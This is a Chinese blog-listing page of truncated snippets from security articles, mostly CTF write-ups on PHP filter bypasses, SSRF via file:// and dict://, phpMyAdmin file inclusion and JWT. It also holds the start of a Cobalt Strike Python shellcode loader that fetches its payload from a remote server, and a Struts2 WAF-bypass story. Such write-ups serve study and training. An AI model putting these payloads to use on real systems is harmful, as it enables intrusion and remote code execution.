比较常规的解法: 由于这题没有出现setbuf(stdin,0),所以本题的输出是缓存在服务器本地的,换句话说:如果程序不正常退出,本题是不会回显flag的。但是本题提供了exit()函数,注意再调用get_flag函数后再ret到exit()函数就可以回显flag了。 32位程序payload = ...
分类:
其他好文 时间:
2021-02-05 10:56:08
阅读次数:
0
在web37的基础上过滤了php 使用data://text/plain;base64绕过 payload:?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs= PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=即<? ...
分类:
Web程序 时间:
2021-02-03 10:29:01
阅读次数:
0
内网访问 伪协议读取文件 url=file:///var/www/html/flag.php 端口扫描 通过dict协议用来探测开放的端口 构造payload: ?url=dict://127.0.0.1:端口号 题目说端口在8000-9000 使用Burp的intruder模块进行爆破 然后开始爆 ...
分类:
其他好文 时间:
2021-02-01 12:27:50
阅读次数:
0
#知识点 phpmyadmin的远程文件读取漏洞 #审题 我本来看这个题目是想着 把这字放到winhex里面 导出.db文件 然后拖到sqlite里面 没想到啊没想到 竟然又是扫描工具扫 #phpmyadmin的远程文件读取漏洞 扫到了phpmyadmin的页面 百度了一下4.8.1版本有远程文件包 ...
分类:
数据库 时间:
2021-01-21 10:47:49
阅读次数:
0
如何使用在线工具手动验证JWT签名 先丢一个转换地址:https://cryptii.com/ 首先: jwt分为三个部分:header,payload,verifysignature header {"typ":"JWT","alg":"HS256"} base64转换: eyJ0eXAiOiJK ...
分类:
其他好文 时间:
2021-01-18 10:42:34
阅读次数:
0
JWT """ 1、组成: header.payload.signature 头.载荷.签名 2、距离: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6Im93ZW4iLCJleHAiOjE1NTgzMDM1 ...
分类:
其他好文 时间:
2021-01-13 10:31:37
阅读次数:
0
使用CS里面生成payload,选择python 勾选64位。 将shellcode代码编码成BASE64 放在远程服务器上 反序列化代码 import pickle import base64 shellcode = """ import ctypes,urllib.request,codecs, ...
分类:
编程语言 时间:
2021-01-12 11:01:03
阅读次数:
0
知识点: ssti的基础知识 python常见内置函数的使用 解题: 很简单的一道ssti注入题,没过滤的,因为我也才开始学习ssti模板注入和python的学习,所以对一些函数,模板的使用还很不牢固,就记录一下。 直接上payload吧,很简单的一道: 第一种: {{().__class__.__ ...
分类:
其他好文 时间:
2021-01-06 11:51:43
阅读次数:
0
某日朋友发来一个Struts2的洞 说开始测试的时候能执行命令,结果交了以后审核说复现不了,他看了一下是被waf拦了。 于是发我看看能不能绕过。 首先用普通的payload打一下 %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAU ...
分类:
其他好文 时间:
2021-01-04 11:08:25
阅读次数:
0
JWT(即json web token),大家先看下面这张图 大家可以观察到,jwt String就是生成后的jwt字符集,其中有两个 "."(注意:jwt校验会对"."个数校验,多或少都会校验失败),被"."分割的就是jwt的三个构成部分,即:header、payload、sign。 接下来,给大 ...
分类:
其他好文 时间:
2020-12-30 10:48:44
阅读次数:
0
